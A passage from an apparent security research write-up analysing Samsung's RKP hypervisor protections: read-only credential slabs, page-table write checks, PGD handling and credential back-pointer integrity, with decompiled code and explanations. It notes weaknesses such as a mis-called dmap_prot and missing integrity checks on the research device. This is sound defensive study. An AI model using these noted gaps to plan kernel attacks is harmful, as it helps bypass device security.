for(sc = 0; sc < (1 << order); sc++) {
uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
va_page += PAGE_SIZE;
}
memcg_uncharge_slab(page, order, s);
__free_pages(page, order);
spin_unlock_irqrestore(&ro_pages_lock,flags);
}
static void __free_slab(struct kmem_cache *s, struct page *page)
{
// ...
dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),0);
// ...
/* We free the protected pages here. */
if (s->name && (!strcmp(s->name, CRED_JAR_RO) ||
!strcmp(s->name, TSEC_JAR) ||
!strcmp(s->name, VFSMNT_JAR))){
free_ro_pages(s,page, order);
return;
}
// ...
}
// from kernel/cred.c
void __init cred_init(void)
{
/* allocate a slab in which we can store credentials */
cred_jar = kmem_cache_create("cred_jar", sizeof(struct cred), 0,
SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, NULL);
#ifdef CONFIG_RKP_KDP
if(rkp_cred_enable) {
cred_jar_ro = kmem_cache_create("cred_jar_ro", sizeof(struct cred),
0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, cred_ctor);
if(!cred_jar_ro) {
panic("Unable to create RO Cred cache\n");
}
tsec_jar = kmem_cache_create("tsec_jar", rkp_get_task_sec_size(),
0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, sec_ctor);
if(!tsec_jar) {
panic("Unable to create RO security cache\n");
}
usecnt_jar = kmem_cache_create("usecnt_jar", sizeof(atomic_t) + sizeof(struct ro_rcu_head),
0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, usecnt_ctor);
if(!usecnt_jar) {
panic("Unable to create use count jar\n");
}
uh_call(UH_APP_RKP, RKP_KDP_X42, (u64)cred_jar_ro->size, (u64)tsec_jar->size, 0, 0);
}
#endif /* CONFIG_RKP_KDP */
}
// from fs/namespace.c
void __init mnt_init(void)
{
// ...
vfsmnt_cache = kmem_cache_create("vfsmnt_cache", sizeof(struct vfsmount),
0, SLAB_HWCACHE_ALIGN | SLAB_PANIC, cred_ctor_vfsmount);
if(!vfsmnt_cache)
panic("Failed to allocate vfsmnt_cache \n");
rkp_ns_fill_params(nsparam,vfsmnt_cache->size,sizeof(struct vfsmount),(u64)offsetof(struct vfsmount,bp_mount),
(u64)offsetof(struct vfsmount,mnt_sb),(u64)offsetof(struct vfsmount,mnt_flags),
(u64)offsetof(struct vfsmount,data));
uh_call(UH_APP_RKP, RKP_KDP_X41, (u64)&nsparam, 0, 0, 0);
// ...
}
// from fs/dcache.c
void __init vfs_caches_init(void)
{
// ...
mnt_init();
// ...
}
// from init/main.c
asmlinkage __visible void __init start_kernel(void)
{
// ...
if (rkp_cred_enable)
kdp_init();
cred_init();
// ...
vfs_caches_init();
// ...
}
Let's summarize which commands are used by the SLUB allocator:
Command | Function | Description |
---|---|---|
RKP_RKP_ROBUFFER_ALLOC | rkp_cmd_rkp_robuffer_alloc | Allocate a read-only page |
RKP_RKP_ROBUFFER_FREE | rkp_cmd_rkp_robuffer_free | Free a read-only page |
RKP_KDP_X50 | rkp_cmd_set_pages_ro_cred_jar | Mark a slab of cred_jar |
RKP_KDP_X4E | rkp_cmd_set_pages_ro_tsec_jar | Mark a slab of tsec_jar |
RKP_KDP_X4F | rkp_cmd_set_pages_ro_vfsmnt_jar | Mark a slab of vfsmnt_jar |
RKP_KDP_X48 | rkp_cmd_ro_free_pages | Unmark a slab |
RKP_KDP_X42 | rkp_cmd_assign_cred_size | Inform of the cred objects size |
RKP_KDP_X41 | rkp_cmd_assign_ns_size | Inform of the ns objects size |
RKP_KDP_X44 | rkp_cmd_cred_set_fp | Set the freelist pointer inside an object |
RKP_KDP_X4A | rkp_cmd_prot_dble_map | Prevent double mapping |
int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t* regs) {
// ...
page = page_allocator_alloc_page();
ret_p = regs->x2;
if ((ret_p & 1) != 0) {
if (ha1 != 0 || ha2 != 0)
rkp_policy_violation("Setting ha1 or ha2 should be done once");
ret_p &= 0xFFFFFFFFFFFFFFFE;
ha1 = page;
ha2 = page + 8;
}
if (ret_p) {
if (!page)
uh_log('L', "rkp.c", 270, "RKP_8f7b0e12");
*virt_to_phys_el1(ret_p) = page;
}
regs->x0 = page;
return 0;
}
rkp_cmd_rkp_robuffer_alloc
simply allocates a page from the page allocator (which uses the "robuf" region that we have seen earlier). The ha1
/ha2
stuff is only used by the RKP test module.
int64_t rkp_cmd_rkp_robuffer_free(saved_regs_t* regs) {
// ...
if (!regs->x2)
uh_log('D', "rkp.c", 286, "Robuffer Free wrong address");
page = rkp_get_pa(regs->x2);
page_allocator_free_page(page);
return 0;
}
`rkp_cmd_rkp_robuffer_free` simply frees the page back to the page allocator.
`rkp_cmd_set_pages_ro_cred_jar`, `rkp_cmd_set_pages_ro_tsec_jar` and `rkp_cmd_set_pages_ro_vfsmnt_jar` call `rkp_set_pages_ro` with a different type.
uint8_t* rkp_set_pages_ro(saved_regs_t* regs, int64_t type) {
// ...
if ((regs->x2 & 0xFFF) != 0)
return uh_log('L', "rkp_kdp.c", 803, "Page not aligned in set_page_ro %lx", regs->x2);
page = rkp_get_pa(regs->x2);
rkp_phys_map_lock(page);
if (rkp_s2_page_change_permission(page, 0x80, 0, 0) == -1) {
uh_log('L', "rkp_kdp.c", 813, "Cred: Unable to set permission %lx %lx %lx", regs->x2, page, 0);
} else {
memset(page, 0xFF, 0x1000);
switch (type) {
case 0:
type = CRED;
break;
case 1:
type = SEC_PTR;
break;
case 2:
type = NS;
break;
}
rkp_phys_map_set(page, type);
return rkp_phys_map_unlock(page);
}
return rkp_phys_map_unlock(page);
}
`rkp_set_pages_ro` does the following:

- ensures the address is page-aligned and converts it to a physical address using `rkp_get_pa`;
- makes the page read-only in EL1 stage 2 using `rkp_s2_page_change_permission`;
- fills the page with 0xFF, and marks it as `CRED`, `SEC_PTR` or `NS` in the physmap.

`rkp_cmd_ro_free_pages` calls `rkp_ro_free_pages`.
uint8_t* rkp_ro_free_pages(saved_regs_t* regs) {
// ...
if ((regs->x2 & 0xFFF) != 0)
return uh_log('L', "rkp_kdp.c", 843, "Page not aligned in set_page_ro %lx", regs->x2);
page = rkp_get_pa(regs->x2);
rkp_phys_map_lock(page);
if (!is_phys_map_cred(page) && !is_phys_map_ns(page) && !is_phys_map_sec_ptr(page)) {
uh_log('L', "rkp_kdp.c", 854, "rkp_ro_free_pages : physmap_entry_invalid %lx %lx ", regs->x2, page);
return rkp_phys_map_unlock(page);
}
if (rkp_s2_page_change_permission(page, 0, 1, 0) < 0) {
uh_log('L', "rkp_kdp.c", 862, "rkp_ro_free_pages: Unable to set permission %lx %lx %lx", regs->x2, page);
return rkp_phys_map_unlock(page);
}
memset(page, 0, 0x1000);
rkp_phys_map_set(page, FREE);
return rkp_phys_map_unlock(page);
}
`rkp_cmd_ro_free_pages` does the following:

- ensures the address is page-aligned and converts it to a physical address using `rkp_get_pa`;
- ensures the page is marked as `CRED`, `SEC_PTR`, or `NS` in the physmap;
- makes the page writable again in EL1 stage 2 using `rkp_s2_page_change_permission`;
- zeroes out the page and marks it as `FREE` in the physmap.

int64_t rkp_cmd_assign_cred_size(saved_regs_t* regs) {
rkp_assign_cred_size(regs);
return 0;
}
rkp_cmd_assign_cred_size
calls rkp_assign_cred_size
.
int64_t rkp_assign_cred_size(saved_regs_t* regs) {
// ...
cred_jar_size = regs->x2;
rkp_cred->CRED_BUFF_SIZE = cred_jar_size;
tsec_jar_size = regs->x3;
rkp_cred->SP_BUFF_SIZE = tsec_jar_size;
return uh_log('L', "rkp_kdp.c", 1033, "BUFF SIZE %lx %lx %lx", cred_jar_size, tsec_jar_size, 0);
}
`rkp_assign_cred_size` does the following:

- stores the size of `struct cred` in `CRED_BUFF_SIZE`;
- stores the size of `struct task_security_struct` in `SP_BUFF_SIZE`.

int64_t rkp_cmd_assign_ns_size(saved_regs_t* regs) {
rkp_assign_ns_size(regs);
return 0;
}
rkp_cmd_assign_ns_size
calls rkp_assign_ns_size
.
int64_t rkp_assign_ns_size(saved_regs_t* regs) {
// ...
if (!rkp_cred)
return uh_log('W', "rkp_kdp.c", 1041, "RKP_ae6cae81");
nsparam_user = rkp_get_pa(regs->x2);
if (!nsparam_user)
return uh_log('L', "rkp_kdp.c", 1048, "NULL Data: rkp assign_ns_size");
memcpy(&nsparam, nsparam_user, sizeof(nsparam));
ns_buff_size = nsparam.ns_buff_size;
ns_size = nsparam.ns_size;
rkp_cred->NS_BUFF_SIZE = ns_buff_size;
rkp_cred->NS_SIZE = ns_size;
if (nsparam.bp_offset > ns_size)
return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
sb_offset = nsparam.sb_offset;
if (nsparam.sb_offset > ns_size)
return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
flag_offset = nsparam.flag_offset;
if (nsparam.flag_offset > ns_size)
return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
data_offset = nsparam.data_offset;
if (nsparam.data_offset > ns_size)
return uh_log('L', "rkp_kdp.c", 1061, "RKP_9a19e9ca");
rkp_cred->BPMNT_VFSMNT_OFFSET = nsparam.bp_offset >> 3;
rkp_cred->SB_VFSMNT_OFFSET = sb_offset >> 3;
rkp_cred->FLAGS_VFSMNT_OFFSET = flag_offset >> 2;
rkp_cred->DATA_VFSMNT_OFFSET = data_offset >> 3;
uh_log('L', "rkp_kdp.c", 1070, "NS Protection Activated Buff_size = %lx ns size = %lx", ns_buff_size, ns_size);
return uh_log('L', "rkp_kdp.c", 1071, "NS %lx %lx %lx %lx", rkp_cred->BPMNT_VFSMNT_OFFSET, rkp_cred->SB_VFSMNT_OFFSET,
rkp_cred->FLAGS_VFSMNT_OFFSET, rkp_cred->DATA_VFSMNT_OFFSET);
}
`rkp_assign_ns_size` does the following:

- copies the fields of the `ns_param` structure given by the kernel;
- ensures the offsets it contains are within the namespace structure size, and stores them into the `rkp_cred` structure.

`rkp_cmd_cred_set_fp` calls `rkp_cred_set_fp`.
int64_t invalid_cred_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
rkp_phys_map_lock(object_pa);
if (!is_phys_map_cred(object_pa) ||
object_va && object_va == object_va / rkp_cred->CRED_BUFF_SIZE * rkp_cred->CRED_BUFF_SIZE &&
rkp_cred->CRED_SIZE == offset) {
rkp_phys_map_unlock(object_pa);
return 0;
} else {
rkp_phys_map_unlock(object_pa);
return 1;
}
}
int64_t invalid_sec_ptr_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
rkp_phys_map_lock(object_pa);
if (!is_phys_map_sec_ptr(object_pa) || object_va &&
object_va == object_va / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE &&
rkp_cred->SP_SIZE == offset) {
rkp_phys_map_unlock(object_pa);
return 0;
} else {
rkp_phys_map_unlock(object_pa);
return 1;
}
}
int64_t invalid_ns_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
rkp_phys_map_lock(object_pa);
if (!is_phys_map_ns(object_pa) || object_va &&
object_va == object_va / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE &&
rkp_cred->NS_SIZE == offset) {
rkp_phys_map_unlock(object_pa);
return 0;
} else {
rkp_phys_map_unlock(object_pa);
return 1;
}
}
void rkp_cred_set_fp(saved_regs_t* regs) {
// ...
object_pa = rkp_get_pa(regs->x2);
offset = regs->x3;
freelist_ptr = regs->x4;
rkp_phys_map_lock(object_pa);
if (!is_phys_map_cred(object_pa) && !is_phys_map_sec_ptr(object_pa) && !is_phys_map_ns(object_pa)) {
uh_log('L', "rkp_kdp.c", 242, "Neither Cred nor Secptr %lx %lx %lx", regs->x2, regs->x3, regs->x4);
is_cred = is_phys_map_cred(object_pa);
is_sec_ptr = is_phys_map_sec_ptr(object_pa);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
rkp_phys_map_unlock(object_pa);
}
rkp_phys_map_unlock(object_pa);
if (freelist_ptr) {
freelist_ptr_pa = rkp_get_pa(freelist_ptr);
rkp_phys_map_lock(freelist_ptr_pa);
if (!is_phys_map_cred(freelist_ptr_pa) && !is_phys_map_sec_ptr(freelist_ptr_pa) &&
!is_phys_map_ns(freelist_ptr_pa)) {
uh_log('L', "rkp_kdp.c", 259, "Invalid Free Pointer %lx %lx %lx", regs->x2, regs->x3, regs->x4);
is_cred = is_phys_map_cred(freelist_ptr_pa);
is_sec_ptr = is_phys_map_sec_ptr(freelist_ptr_pa);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
rkp_phys_map_unlock(freelist_ptr_pa);
}
rkp_phys_map_unlock(freelist_ptr_pa);
}
if (invalid_cred_fp(object_pa, regs->x2, offset)) {
uh_log('L', "rkp_kdp.c", 267, "Invalid cred pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
} else if (invalid_sec_ptr_fp(object_pa, regs->x2, offset)) {
uh_log('L', "rkp_kdp.c", 272, "Invalid Security pointer_fp 111 %lx %lx %lx", regs->x2, regs->x3, regs->x4);
is_sec_ptr = is_phys_map_sec_ptr(object_pa);
uh_log('L', "rkp_kdp.c", 273, "Invalid Security pointer_fp 222 %lx %lx %lx %lx %lx", is_sec_ptr, regs->x2,
regs->x2 - regs->x2 / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE, offset, rkp_cred->SP_SIZE);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
} else if (invalid_ns_fp(object_pa, regs->x2, offset)) {
uh_log('L', "rkp_kdp.c", 278, "Invalid Namespace pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
} else {
*(offset + object_pa) = freelist_ptr;
}
}
`rkp_cred_set_fp` does the following:

- ensures the object and the new freelist pointer are located in pages marked as `CRED`, `SEC_PTR` or `NS` in the physmap, and triggers a policy violation otherwise;
- ensures the freelist pointer offset is coherent with the object type (using `invalid_cred_fp`, `invalid_sec_ptr_fp` and `invalid_ns_fp`), and triggers a policy violation otherwise;
- finally, writes the freelist pointer into the object.

`rkp_cmd_prot_dble_map` calls `rkp_prot_dble_map`.
saved_regs_t* rkp_prot_dble_map(saved_regs_t* regs) {
// ...
address = regs->x2 & 0xFFFFFFFFF000;
if (!address)
return 0;
val = regs->x4;
if (val > 1) {
uh_log('L', "rkp_kdp.c", 1163, "Invalid op val %lx ", val);
return 0;
}
order = regs->x3;
if (order <= 19) {
offset = 0;
size = 0x1000 << order;
do {
res = rkp_set_map_bitmap(address + offset, val);
if (!res) {
uh_log('L', "rkp_kdp.c", 1169, "Page has no bitmap %lx %lx %lx ", address + offset, val, offset);
}
offset += 0x1000;
} while (offset < size);
}
}
`rkp_prot_dble_map` does the following:

- ensures the value (in X4) is 0 or 1 and the order (in X3) is at most 19;
- calls `rkp_set_map_bitmap` (which uses `dbl_bitmap`) on each page of the region.

The attentive reader will have noticed that the kernel function `dmap_prot` doesn't even call `rkp_prot_dble_map` properly: it doesn't give it its `addr` argument, so the arguments are all messed up.
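For comparison, given that rkp_prot_dble_map reads the address from X2, the order from X3 and the value from X4, a call that actually matched the handler would presumably need to look like the following (hypothetical; this is not what the shipped kernel does):

static inline void dmap_prot_fixed(u64 addr, u64 order, u64 val)
{
    /* hypothetical corrected version: pass the address first so it lands in X2 */
    if (rkp_cred_enable)
        uh_call(UH_APP_RKP, RKP_KDP_X4A, addr, order, val, 0);
}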
What happens if the kernel needs to modify its page table entries? On the kernel side, this happens for each level in set_pud
, set_pmd
and set_pte
of arch/arm64/include/asm/pgtable.h
.
static inline void set_pud(pud_t *pudp, pud_t pud)
{
#ifdef CONFIG_UH_RKP
if (rkp_is_pg_protected((u64)pudp)) {
uh_call(UH_APP_RKP, RKP_WRITE_PGT1, (u64)pudp, pud_val(pud), 0, 0);
} else {
asm volatile("mov x1, %0\n"
"mov x2, %1\n"
"str x2, [x1]\n"
:
: "r" (pudp), "r" (pud)
: "x1", "x2", "memory");
}
#else
*pudp = pud;
#endif
dsb(ishst);
isb();
}
static inline void set_pmd(pmd_t *pmdp, pmd_t pmd)
{
#ifdef CONFIG_UH_RKP
if (rkp_is_pg_protected((u64)pmdp)) {
uh_call(UH_APP_RKP, RKP_WRITE_PGT2, (u64)pmdp, pmd_val(pmd), 0, 0);
} else {
asm volatile("mov x1, %0\n"
"mov x2, %1\n"
"str x2, [x1]\n"
:
: "r" (pmdp), "r" (pmd)
: "x1", "x2", "memory");
}
#else
*pmdp = pmd;
#endif
dsb(ishst);
isb();
}
static inline void set_pte(pte_t *ptep, pte_t pte)
{
#ifdef CONFIG_UH_RKP
/* bug on double mapping */
BUG_ON(pte_val(pte) && rkp_is_pg_dbl_mapped(pte_val(pte)));
if (rkp_is_pg_protected((u64)ptep)) {
uh_call(UH_APP_RKP, RKP_WRITE_PGT3, (u64)ptep, pte_val(pte), 0, 0);
} else {
asm volatile("mov x1, %0\n"
"mov x2, %1\n"
"str x2, [x1]\n"
:
: "r" (ptep), "r" (pte)
: "x1", "x2", "memory");
}
#else
*ptep = pte;
#endif
/*
* Only if the new pte is valid and kernel, otherwise TLB maintenance
* or update_mmu_cache() have the necessary barriers.
*/
if (pte_valid_not_user(pte)) {
dsb(ishst);
isb();
}
}
These functions have been modified. For all 3 levels, they check if the entry they are trying to write to has been set as read-only by RKP (using ro_bitmap
that we saw earlier), and if that is the case, they will call the hypervisor using the uh_call
function. The commands used for each level are (respectively):

- `RKP_WRITE_PGT1`;
- `RKP_WRITE_PGT2`;
- `RKP_WRITE_PGT3`.

It can also be noted that `set_pte` will in addition check if the (intermediate) physical address is already mapped, using `dbl_bitmap`, to prevent double mapping (mapping of the same PA to two or more VAs).
On the hypervisor side, rkp_cmd_write_pgtx
simply calls rkp_lxpgt_write
after incrementing a counter.
uint8_t* rkp_l1pgt_write(uint64_t pudp, int64_t pud_new) {
// ...
pudp_pa = rkp_get_pa(pudp);
pud_old = *pudp_pa;
rkp_phys_map_lock(pudp_pa);
if (!is_phys_map_l1(pudp_pa)) {
if (!rkp_deferred_inited) {
set_entry_of_pgt((int64_t*)pudp_pa, pud_new);
return rkp_phys_map_unlock(pudp_pa);
}
rkp_policy_violation("L1 write wrong page, %lx, %lx", pudp_pa, pud_new);
}
is_kernel = is_phys_map_kernel(pudp_pa);
if (pud_old) {
if ((pud_old & 3) != 3)
rkp_policy_violation("l1_pgt write cannot handle blocks - for old entry, %lx", pudp_pa);
res = rkp_l2pgt_process_table(pud_old & 0xFFFFFFFFF000, (pudp_pa << 27) & 0x7FC0000000, 0);
}
start_addr = 0xFFFFFF8000000000;
if (!is_kernel)
start_addr = 0;
if (pud_new) {
addr = start_addr | (pudp_pa << 27) & 0x7FC0000000;
if ((pud_new & 3) != 3)
rkp_policy_violation("l1_pgt write cannot handle blocks - for new entry, %lx", pud_new);
res = rkp_l2pgt_process_table(pud_new & 0xFFFFFFFFF000, addr, 1);
if (!is_kernel)
set_pxn_bit_of_desc(&pud_new, 1);
if ((pud_new & 3) != 0 && (pud_new & 0xFFFFFFFFF000) == 0)
uh_log('L', "rkp_l1pgt.c", 309, "l1 write zero");
}
if (res) {
uh_log('L', "rkp_l1pgt.c", 316, "L1 write failed, %lx, %lx", pudp_pa, pud_new);
return rkp_phys_map_unlock(pudp_pa);
}
set_entry_of_pgt(pudp_pa, pud_new);
return rkp_phys_map_unlock(pudp_pa);
}
`rkp_l1pgt_write` does the following:

- it ensures the target page is marked as `L1` in the physmap (before deferred init, unmarked pages are simply written to; after it, this is a policy violation);
- if the old entry was valid, it calls `rkp_l2pgt_process_table` on the old L2 table, with `is_alloc` = 0 to indicate a removal;
- if the new entry is valid, it calls `rkp_l2pgt_process_table` on the new L2 table, and sets the PXN bit of the descriptor for user page tables;
- it finally writes the new value of the entry.

uint8_t* rkp_l2pgt_write(int64_t pmdp, int64_t pmd_new) {
// ...
pmdp_pa = rkp_get_pa(pmdp);
pmd_old = *pmdp_pa;
rkp_phys_map_lock(pmdp_pa);
if (!is_phys_map_l2(pmdp_pa)) {
if (rkp_deferred_inited) {
uh_log('D', "rkp_l2pgt.c", 236, "l2 is not marked as L2 Type in Physmap, trying to fix it, %lx", pmdp_pa);
} else {
set_entry_of_pgt(pmdp_pa, pmd_new);
return rkp_phys_map_unlock(pmdp_pa);
}
}
is_flag3 = is_phys_map_flag3(pmdp_pa);
is_kernel = is_phys_map_kernel(pmdp_pa);
start_addr = 0xFFFFFF8000000000;
if (!is_kernel)
start_addr = 0;
addr = (pmdp_pa << 18) & 0x3FE00000 | ((is_flag3 & 0x1FF) << 30) | start_addr;
if (pmd_old) {
res = check_single_l2e(pmdp_pa, addr, 0);
if (res < 0) {
uh_log('L', "rkp_l2pgt.c", 254, "Failed in freeing entries under the l2e %lx %lx", pmdp_pa, pmd_new);
uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
return rkp_phys_map_unlock(pmdp_pa);
}
}
if (pmd_new) {
res = check_single_l2e(&pmd_new, addr, 1);
if (res < 0) {
uh_log('L', "rkp_l2pgt.c", 276, "l2 write failed, %lx, %lx", pmdp_pa, pmd_new);
return rkp_phys_map_unlock(pmdp_pa);
}
if ((pmd_new & 3) != 0 && (pmd_new & 0xFFFFFFFFF000) == 0)
uh_log('L', "rkp_l2pgt.c", 269, "l2 write zero, %lx", pmdp_pa);
}
set_entry_of_pgt(pmdp_pa, pmd_new);
return rkp_phys_map_unlock(pmdp_pa);
}
`rkp_l2pgt_write` does the following:

- it ensures the target page is marked as `L2` in the physmap (before deferred init, unmarked pages are simply written to);
- if the old entry was valid, it calls `check_single_l2e` on the old entry, with `is_alloc` = 0 to indicate a removal;
- if the new entry is valid, it calls `check_single_l2e` on the new entry;
- it finally writes the new value of the entry.

int64_t* rkp_l3pgt_write(uint64_t ptep, int64_t pte_val) {
// ...
ptep_pa = rkp_get_pa(ptep);
rkp_phys_map_lock(ptep_pa);
if (is_phys_map_l3(ptep_pa) || is_phys_map_free(ptep_pa)) {
if ((pte_val & 3) != 3 || get_pxn_bit_of_desc(pte_val, 3))
allowed = 1;
else
allowed = rkp_deferred_inited == 0;
} else {
allowed = 0;
}
rkp_phys_map_unlock(ptep_pa);
cs_enter(&l3pgt_lock);
if (stext_ptep && ptep_pa < stext_ptep && (ptep_pa ^ stext_ptep) <= 0xFFF) {
if (pte_val)
pte_val |= 0x20000000000000;
cs_exit(&l3pgt_lock);
return set_entry_of_pgt(ptep_pa, pte_val);
}
cs_exit(&l3pgt_lock);
if (!allowed) {
pxn_bit = get_pxn_bit_of_desc(pte_val, 3);
return rkp_policy_violation("Write L3 to wrong page type, %lx, %lx, %x", ptep_pa, pte_val, pxn_bit);
}
return set_entry_of_pgt(ptep_pa, pte_val);
}
`rkp_l3pgt_write` does the following:

- if the target page is marked as `L3` or `FREE` in the physmap, and the new entry is not a page descriptor or has the PXN bit set (or deferred init hasn't happened yet), it sets `allowed` to 1. In all other cases, `allowed` will still be 0;
- if the PTE belongs to the same table as `stext_ptep`, it sets the PXN bit of the new value, makes the modification and returns;
- if `allowed` is 1, it makes the modification and returns; otherwise, it triggers a policy violation.

Another operation that the kernel might need to do is allocate or free a page table directory. On the kernel side, this is done by `pgd_alloc` and `pgd_free` of arch/arm64/mm/pgd.c.
pgd_t *pgd_alloc(struct mm_struct *mm)
{
// ...
pgd_t *ret = NULL;
ret = (pgd_t *) rkp_ro_alloc();
if (!ret) {
if (PGD_SIZE == PAGE_SIZE)
ret = (pgd_t *)__get_free_page(PGALLOC_GFP);
else
ret = kmem_cache_alloc(pgd_cache, PGALLOC_GFP);
}
if(unlikely(!ret)) {
pr_warn("%s: pgd alloc is failed\n", __func__);
return ret;
}
uh_call(UH_APP_RKP, RKP_NEW_PGD, (u64)ret, 0, 0, 0);
return ret;
// ...
}
void pgd_free(struct mm_struct *mm, pgd_t *pgd)
{
// ...
uh_call(UH_APP_RKP, RKP_FREE_PGD, (u64)pgd, 0, 0, 0);
/* if pgd memory come from read only buffer, the put it back */
/*TODO: use a macro*/
if (is_rkp_ro_page((u64)pgd))
rkp_ro_free((void *)pgd);
else {
if (PGD_SIZE == PAGE_SIZE)
free_page((unsigned long)pgd);
else
kmem_cache_free(pgd_cache, pgd);
}
// ...
}
Once again, these functions have been modified. The first modification is that instead of using pages from the kernel page allocator, they will use read-only pages returned by RKP. These pages are allocated using `rkp_ro_alloc` and freed using `rkp_ro_free`.
The second modification is that they will make RKP aware of the newly allocated or freed page table directory by calling uh_call
with the command RKP_NEW_PGD
and RKP_FREE_PGD
respectively.
On the hypervisor side, rkp_cmd_new_pgd
and rkp_cmd_free_pgd
call rkp_l1pgt_new_pgd
and rkp_l1pgt_free_pgd
respectively, after incrementing a counter.
void rkp_l1pgt_new_pgd(saved_regs_t* regs) {
// ...
pgdp = rkp_get_pa(regs->x2) & 0xFFFFFFFFFFFFF000;
if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || TRAMP_PGD && pgdp == TRAMP_PGD) {
rkp_policy_violation("PGD new value not allowed, pgdp : %lx", pgdp);
} else if (rkp_inited) {
if (rkp_l1pgt_process_table(pgdp, 0, 1) < 0)
uh_log('L', "rkp_l1pgt.c", 383, "l1pgt processing is failed, pgdp : %lx", pgdp);
}
}
`rkp_l1pgt_new_pgd` does the following:

- it triggers a policy violation if the new PGD is `swapper_pg_dir`, `idmap_pg_dir` or `tramp_pg_dir`;
- otherwise, it processes the new PGD by calling `rkp_l1pgt_process_table`.

void rkp_l1pgt_free_pgd(saved_regs_t* regs) {
// ...
pgd_pa = rkp_get_pa(regs->x2);
pgdp = pgd_pa & 0xFFFFFFFFFFFFF000;
if (pgdp == INIT_MM_PGD || pgdp == ID_MAP_PGD || (TRAMP_PGD && pgdp == TRAMP_PGD)) {
uh_log('E', "rkp_l1pgt.c", 345, "PGD free value not allowed, pgdp=%lx k_pgd=%lx k_id_pgd=%lx", pgdp, INIT_MM_PGD,
ID_MAP_PGD);
rkp_policy_violation("PGD free value not allowed, pgdp=%p k_pgd=%p k_id_pgd=%p", pgdp, INIT_MM_PGD, ID_MAP_PGD);
} else if (rkp_inited) {
if ((get_ttbr0_el1() & 0xFFFFFFFFFFFF) == (pgd_pa & 0xFFFFFFFFF000) ||
(get_ttbr1_el1() & 0xFFFFFFFFFFFF) == (pgd_pa & 0xFFFFFFFFF000)) {
uh_log('E', "rkp_l1pgt.c", 354, "PGD free value not allowed, pgdp=%lx ttbr0_el1=%lx ttbr1_el1=%lx", pgdp,
get_ttbr0_el1(), get_ttbr1_el1());
}
if (rkp_l1pgt_process_table(pgdp, 0, 0) < 0)
uh_log('L', "rkp_l1pgt.c", 363, "l1pgt processing is failed, pgdp : %lx", pgdp);
}
}
`rkp_l1pgt_free_pgd` does the following:

- it triggers a policy violation if the PGD being freed is `swapper_pg_dir`, `idmap_pg_dir` or `tramp_pg_dir`;
- it logs an error if it is the PGD currently loaded in `TTBR0_EL1` or `TTBR1_EL1`;
- otherwise, it calls `rkp_l1pgt_process_table` to process the removal.

We have seen that struct cred
and struct task_security_struct
are now allocated in read-only pages and cannot be modified by the kernel. These structures also get new fields that are going to be used for Data Flow Integrity. Each one gets a "back-pointer", which is a pointer to the owning structure:
- the owning `struct task_struct` for the `struct cred`;
- the owning `struct cred` for the `struct task_security_struct`.

The `struct cred` also gets a back-pointer to the owning task's PGD, as well as a "use counter" that prevents reusing the `struct cred` of another `struct task_struct` (especially init's credentials).
// from include/linux/cred.h
struct cred {
// ...
atomic_t *use_cnt;
struct task_struct *bp_task;
void *bp_pgd;
unsigned long long type;
} __randomize_layout;
// from security/selinux/include/objsec.h
struct task_security_struct {
// ...
void *bp_cred;
};
These values are supposed to be verified on each SELinux hook via a call to `security_integrity_current`, but it looks like this isn't implemented on our research device and they may have forgotten to add it. We will take a source code snippet from another device that has it.
// from security/security.c
#define call_void_hook(FUNC, ...) \
do { \
struct security_hook_list *P; \
\
if(security_integrity_current()) break; \
list_for_each_entry(P, &security_hook_heads.FUNC, list) \
P->hook.FUNC(__VA_ARGS__); \
} while (0)
#define call_int_hook(FUNC, IRC, ...) ({ \
int RC = IRC; \
do { \
struct security_hook_list *P; \
\
RC = security_integrity_current(); \
if (RC != 0) \
break; \
list_for_each_entry(P, &security_hook_heads.FUNC, list) { \
RC = P->hook.FUNC(__VA_ARGS__); \
if (RC != 0) \
break; \
} \
} while (0); \
RC; \
})
// from security/selinux/hooks.c
static inline unsigned int cmp_sec_integrity(const struct cred *cred,struct mm_struct *mm)
{
return ((cred->bp_task != current) ||
(mm && (!( in_interrupt() || in_softirq())) &&
(cred->bp_pgd != swapper_pg_dir) &&
(mm->pgd != cred->bp_pgd)));
}
extern struct cred init_cred;
static inline unsigned int rkp_is_valid_cred_sp(u64 cred,u64 sp)
{
struct task_security_struct *tsec = (struct task_security_struct *)sp;
if((cred == (u64)&init_cred) &&
( sp == (u64)&init_sec)){
return 0;
}
if(!rkp_ro_page(cred)|| !rkp_ro_page(cred+sizeof(struct cred)-1)||
(!rkp_ro_page(sp)|| !rkp_ro_page(sp+sizeof(struct task_security_struct)-1))) {
return 1;
}
if((u64)tsec->bp_cred != cred) {
return 1;
}
return 0;
}
inline void rkp_print_debug(void)
{
u64 pgd;
struct cred *cred;
pgd = (u64)(current->mm?current->mm->pgd:swapper_pg_dir);
cred = (struct cred *)current_cred();
